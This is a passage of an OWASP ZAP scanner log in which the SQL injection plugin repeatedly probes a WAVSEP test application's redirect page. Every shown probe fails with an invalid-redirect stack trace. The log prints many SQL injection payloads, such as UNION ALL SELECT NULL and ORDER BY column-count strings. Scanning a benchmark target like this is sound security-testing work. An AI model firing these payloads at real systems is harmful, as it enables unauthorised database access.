org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679480 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679480 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679481 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679481 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679482 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679483 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679483 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679484 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679485 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679485 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679486 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679487 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679487 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 5245#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 5245# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 